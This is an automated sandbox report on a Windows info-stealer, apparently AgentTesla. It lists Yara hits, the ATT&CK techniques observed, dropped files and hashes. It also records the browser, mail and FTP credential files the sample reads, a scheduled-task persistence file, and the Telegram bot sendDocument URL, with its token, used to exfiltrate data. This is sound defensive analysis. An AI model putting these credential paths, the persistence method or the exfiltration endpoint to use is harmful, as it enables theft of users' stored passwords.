Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe PID: 6956, type: MEMORYSTR
Source: Yara match | File source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.3613f70.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.35dfb50.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.35dfb50.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.35a9930.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.3613f70.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000F.00000000.337227939.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000000.338699898.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000000.327062889.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.521016859.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.346406018.00000000035A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000000.338146222.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.527278934.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe PID: 3984, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe PID: 6956, type: MEMORYSTR
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: Yara match | File source: 0000000F.00000002.527278934.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe PID: 6956, type: MEMORYSTR

                Remote Access Functionality

Source: Yara match | File source: 0000000F.00000002.527278934.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe PID: 3984, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe PID: 6956, type: MEMORYSTR
Source: Yara match | File source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.3613f70.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.35dfb50.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.35dfb50.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.35a9930.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.3613f70.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000F.00000000.337227939.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000000.338699898.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000000.327062889.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.521016859.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.346406018.00000000035A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000000.338146222.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.527278934.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe PID: 3984, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe PID: 6956, type: MEMORYSTR
Tactics and techniques (one line per matrix column; numeric prefixes on techniques are kept as shown in the report)

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 211 Windows Management Instrumentation; 1 Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
Persistence: 1 Scheduled Task/Job; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Privilege Escalation: 111 Process Injection; 1 Scheduled Task/Job; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Defense Evasion: 11 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 13 Software Packing; 1 Masquerading; 131 Virtualization/Sandbox Evasion; 111 Process Injection; Indicator Removal from Tools
Credential Access: 2 OS Credential Dumping; 11 Input Capture; 1 Credentials in Registry; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 1 File and Directory Discovery; 114 System Information Discovery; 1 Query Registry; 311 Security Software Discovery; 1 Process Discovery; 131 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 Remote System Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
Collection: 11 Archive Collected Data; 2 Data from Local System; 1 Email Collection; 11 Input Capture; 1 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Command and Control: 1 Web Service; 11 Encrypted Channel; 2 Non-Application Layer Protocol; 3 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue
Behavior Graph (ID: 635380, Sample: SecuriteInfo.com.W32.AIDete..., Startdate: 27/05/2022, Architecture: WINDOWS, Score: 100)
Sample-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for dropped file; 7 other signatures
Process: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe (started)
• Dropped files: C:\Users\user\AppData\Roaming\HksvOcmoc.exe (PE32); C:\Users\user\AppData\Local\...\tmpCB43.tmp (XML)
• Signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines); Uses schtasks.exe or at.exe to add and modify task schedules; 2 other signatures
• Child processes started: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe; powershell.exe; schtasks.exe
Process: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe (child, started)
• DNS/IP: api.telegram.org 149.154.167.220, 443, 49764, TELEGRAMRU, United Kingdom
• Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; 2 other signatures
Process: powershell.exe (started) -> conhost.exe (started)
Process: schtasks.exe (started) -> conhost.exe (started)

No Antivirus matches
Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\HksvOcmoc.exe | 30% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
Source | Detection | Scanner | Label
15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.6.unpack | 100% | Avira | TR/Spy.Gen8
15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.10.unpack | 100% | Avira | TR/Spy.Gen8
15.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8
15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.8.unpack | 100% | Avira | TR/Spy.Gen8
15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.12.unpack | 100% | Avira | TR/Spy.Gen8
15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.4.unpack | 100% | Avira | TR/Spy.Gen8
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.telegram.org | 149.154.167.220 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot5279079600:AAH3TUQchNyBBlwuTxWo12fRiywroON6BJo/sendDocument | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 635380
Start date and time: 27/05/2022 20:48:28 (2022-05-27 20:48:28 +02:00)
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 13s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: SecuriteInfo.com.W32.AIDetectNet.01.20229.6203 (renamed file extension from 6203 to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 27
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@9/9@1/1
                                                  EGA Information:
                                                  • Successful, ratio: 100%
                                                  HDC Information:
                                                  • Successful, ratio: 1.3% (good quality ratio 1.1%)
                                                  • Quality average: 61.7%
                                                  • Quality standard deviation: 37.3%
                                                  HCA Information:
                                                  • Successful, ratio: 89%
                                                  • Number of executed functions: 52
                                                  • Number of non-executed functions: 3
                                                  Cookbook Comments:
                                                  • Adjust boot time
                                                  • Enable AMSI
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, store-images.s-microsoft.com, login.live.com, settings-win.data.microsoft.com, ctldl.windowsupdate.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Not all processes were analyzed, report is missing behavior information
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • VT rate limit hit for: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe
Time | Type | Description
20:50:03 | API Interceptor | 494x Sleep call for process: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe modified
20:50:12 | API Interceptor | 29x Sleep call for process: powershell.exe modified
                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  149.154.167.220doc20220010010021.pdf.exeGet hashmaliciousBrowse
SecuriteInfo.com.W32.AIDetectNet.01.12395.exe    malicious
SecuriteInfo.com.W32.AIDetectNet.01.24645.exe    malicious
SecuriteInfo.com.generic.ml.22865.exe    malicious
Purchase Order.exe    malicious
bank details.exe    malicious
ow1AfiDuDe.exe    malicious
SecuriteInfo.com.W32.AIDetectNet.01.12531.exe    malicious
SecuriteInfo.com.W32.AIDetect.malware2.14840.exe    malicious
SecuriteInfo.com.W32.AIDetectNet.01.18390.exe    malicious
6f.exe    malicious
Re_payment_invoices.pdf.exe    malicious
docCCF003066.exe    malicious
Halkbank_Ekstre_20220522_073809_405251.exe    malicious
dekond.exe    malicious
AKIBET202205250000000,xls.exe    malicious
TransactionReportAdvice20220525_001920010191.exe    malicious
20220525_733363884473.exe    malicious
serin inv.1308.doc    malicious
AQ9jyGGZZS.exe    malicious
Match: api.telegram.org
Associated Sample Name / URL    Detection    Context
doc20220010010021.pdf.exe    malicious    149.154.167.220
TRANSFERÊNCIA BANCÁRIA 1517796961.exe    malicious    149.154.167.220
SecuriteInfo.com.W32.AIDetectNet.01.12395.exe    malicious    149.154.167.220
SecuriteInfo.com.W32.AIDetectNet.01.24645.exe    malicious    149.154.167.220
SecuriteInfo.com.W32.AIDetectNet.01.14067.exe    malicious    149.154.167.220
SecuriteInfo.com.generic.ml.22865.exe    malicious    149.154.167.220
Purchase Order.exe    malicious    149.154.167.220
bank details.exe    malicious    149.154.167.220
ow1AfiDuDe.exe    malicious    149.154.167.220
SecuriteInfo.com.W32.AIDetectNet.01.12531.exe    malicious    149.154.167.220
SecuriteInfo.com.W32.AIDetect.malware2.14840.exe    malicious    149.154.167.220
SecuriteInfo.com.W32.AIDetectNet.01.18390.exe    malicious    149.154.167.220
6f.exe    malicious    149.154.167.220
Re_payment_invoices.pdf.exe    malicious    149.154.167.220
docCCF003066.exe    malicious    149.154.167.220
Halkbank_Ekstre_20220522_073809_405251.exe    malicious    149.154.167.220
dekond.exe    malicious    149.154.167.220
AKIBET202205250000000,xls.exe    malicious    149.154.167.220
TransactionReportAdvice20220525_001920010191.exe    malicious    149.154.167.220
20220525_733363884473.exe    malicious    149.154.167.220
Match: TELEGRAMRU
Associated Sample Name / URL    Detection    Context
doc20220010010021.pdf.exe    malicious    149.154.167.220
SecuriteInfo.com.W32.AIDetectNet.01.12395.exe    malicious    149.154.167.220
SecuriteInfo.com.W32.AIDetectNet.01.24645.exe    malicious    149.154.167.220
kyTwt6MpdH.exe    malicious    149.154.167.99
SecuriteInfo.com.generic.ml.22865.exe    malicious    149.154.167.220
Purchase Order.exe    malicious    149.154.167.220
https://telegra.ph/Income-from-1200-per-day-05-23-4?id79864    malicious    149.154.164.13
bank details.exe    malicious    149.154.167.220
ow1AfiDuDe.exe    malicious    149.154.167.220
SecuriteInfo.com.W32.AIDetectNet.01.12531.exe    malicious    149.154.167.220
SecuriteInfo.com.W32.AIDetect.malware2.14840.exe    malicious    149.154.167.220
SecuriteInfo.com.W32.AIDetectNet.01.18390.exe    malicious    149.154.167.220
6f.exe    malicious    149.154.167.220
Re_payment_invoices.pdf.exe    malicious    149.154.167.220
docCCF003066.exe    malicious    149.154.167.220
N2ggWMNLYe.exe    malicious    149.154.167.99
Halkbank_Ekstre_20220522_073809_405251.exe    malicious    149.154.167.220
dekond.exe    malicious    149.154.167.220
AKIBET202205250000000,xls.exe    malicious    149.154.167.220
TransactionReportAdvice20220525_001920010191.exe    malicious    149.154.167.220
Match: 3b5074b1b5d032e5620f69f9f700ff0e
Associated Sample Name / URL    Detection    Context
doc20220010010021.pdf.exe    malicious    149.154.167.220
DHL PACKAGE DOCUMENT.exe    malicious    149.154.167.220
W-4367-54-3--2-.lnk    malicious    149.154.167.220
90-868-7656.lnk    malicious    149.154.167.220
56516426-056C-4DBA-984B-979F68AB8D18 pdf.exe    malicious    149.154.167.220
Znhawianj.exe    malicious    149.154.167.220
Confirmation Transfer Ref_MT103_00234568910992898.exe    malicious    149.154.167.220
ENQ # 1220014088.exe    malicious    149.154.167.220
TT COPY Euro 57,890_CI0099484_pdf.vbs    malicious    149.154.167.220
SecuriteInfo.com.W32.AIDetectNet.01.12395.exe    malicious    149.154.167.220
SecuriteInfo.com.W32.AIDetectNet.01.24645.exe    malicious    149.154.167.220
SecuriteInfo.com.BackDoor.SiggenNET.35.30620.exe    malicious    149.154.167.220
kyTwt6MpdH.exe    malicious    149.154.167.220
methoden.exe    malicious    149.154.167.220
https://nathanu.tk/.well-known/wp-content/smp/excelz/index.php&design=DAFBx6CPpcc    malicious    149.154.167.220
SecuriteInfo.com.W32.AIDetectNet.01.24324.exe    malicious    149.154.167.220
SecuriteInfo.com.generic.ml.22865.exe    malicious    149.154.167.220
SecuriteInfo.com.W32.AIDetectNet.01.4805.exe    malicious    149.154.167.220
Purchase Order.exe    malicious    149.154.167.220
bank details.exe    malicious    149.154.167.220
No context
Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe
File Type:ASCII text, with CRLF line terminators
Category:modified
Size (bytes):1308
Entropy (8bit):5.345811588615766
Encrypted:false
SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84FsXE8:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzu
MD5:2E016B886BDB8389D2DD0867BE55F87B
SHA1:25D28EF2ACBB41764571E06E11BF4C05DD0E2F8B
SHA-256:1D037CF00A8849E6866603297F85D3DABE09535E72EDD2636FB7D0F6C7DA3427
SHA-512:C100729153954328AA2A77EECB2A3CBD03CB7E8E23D736000F890B17AAA50BA87745E30FB9E2B0D61E16DCA45694C79B4CE09B9F4475220BEB38CAEA546CFC2A
Malicious:false
Reputation:high, very likely benign file
Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):14734
Entropy (8bit):4.996142136926143
Encrypted:false
SSDEEP:384:wt8OdB+Fiib4YNXp5dGxopbjvwRjdvRzJYociQ0HzAF8:w8OdB+FhNZT4opbjoRjdvRzJYocinHzr
MD5:8BFB5BDCC39FDA027B2D719367EBD70C
SHA1:C64E6B36FF61E6747F50645728D8F6DA280BC717
SHA-256:7EEAF90224B2598135FD21AA368D136E33E98B9E40CCB22D60D3B9D22E7A91EA
SHA-512:C367B45F7DCD8A65BF047C4D8FC9C5CB2E36E5FB196866F4753210EEAF2B8D284CCC817A8A4DC0D44E81DF346487379D745049F4B17FF30DCE8AB7CBC59337C2
Malicious:false
Reputation:moderate, very likely benign file
Preview:PSMODULECACHE.......`.....Q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitsTransfer\BitsTransfer.psd1........Start-BitsTransfer........Set-BitsTransfer........Get-BitsTransfer........Resume-BitsTransfer........Add-BitsFile........Suspend-BitsTransfer........Complete-BitsTransfer........Remove-BitsTransfer........-vF.....[...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\AppBackgroundTask\AppBackgroundTask.psd1....#...Set-AppBackgroundTaskResourcePolicy........Unregister-AppBackgroundTask........Get-AppBackgroundTask........tid........pfn........iru....%...Enable-AppBackgroundTaskDiagnosticLog........Start-AppBackgroundTask....&...Disable-AppBackgroundTaskDiagnosticLog................a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Unins

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):22252
Entropy (8bit):5.600930086358679
Encrypted:false
SSDEEP:384:atCDY06fVPfsKpZLpK3kSBKnIjultIE47nvfg3hInkML+KfmAV7SJWd+MZQvnI+K:ZKpZLqk4KICltXE66vKOp2K+Q
MD5:1414AAEC05F804A0D34793A833F82FC1
SHA1:F2274FA4AC682F9936EED33FAC8A9EE3B841D266
SHA-256:33A11C07F096E822399D6FC7B2898417FB253F6FFDAFD77F3E8FC1F75D3B4902
SHA-512:C393C1767BFF91B30A3570CE900BD2B38AC818A29E6EAC9E85A8513F0599681591C07383F7FDFD843D443365A8536F123D851D4D33E6363612D040ED41125B17
Malicious:false
Reputation:low
Preview:@...e...........t.......K...9.2./....................@..........H...............<@.^.L."My...:W..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:U:U
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:false
Preview:1

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:U:U
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:false
Preview:1

Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe
File Type:XML 1.0 document, ASCII text
Category:dropped
Size (bytes):1596
Entropy (8bit):5.134924908448168
Encrypted:false
SSDEEP:24:2di4+S2qh/S1KTy1moCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaVaxvn:cgeKwYrFdOFzOzN33ODOiDdKrsuTTv
MD5:6F36C2CF6A288D4CB2690B9D13E15891
SHA1:D66864469FEF66B89B912C91DCEC93D1E5943049
SHA-256:DC19EAC109B6092AE8F7B9E8C0F0C06F49669D7408A7A2C9C9C6BB1E7156175F
SHA-512:88674385C5D92AEF4A8B334FBACEAAD55D6C071FBBFA4A962F48F7FCACEE1D9A13C6CA1FAAAC9EF642B4C76C033C8CDE2EC801F291CCBF5D38AB00D047EF294E
Malicious:true
Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <

Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):886272
Entropy (8bit):7.566668421486731
Encrypted:false
SSDEEP:12288:j0pGjZ16ryOpqfE5Cg0iAgCBBKWcZL/Z7W3bFqrdlBgo0iVSJj1sGVJt1q0j:gpGjmpaE4gN2BXcZR7+IrFgRj1bVF
MD5:ADEC785F7CBAA5AF9C8C7FA50CF91BAA
SHA1:D55FC2F774A1728526A753284E350AEA08E3B17D
SHA-256:FB6EB7EFDF26E5F8EAAB963DAB6A7FB808724A4288D4DF1FB8F146E13471E53D
SHA-512:FF0AFC52A2B2D18B16AE6DFE480966AF0B372C39B8C2738315DBAB03ADBFF0BED2F4C358ACAA09296D40A83C77BE8ED49FD82F1B0DA216353581B62EA18BE203
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 30%
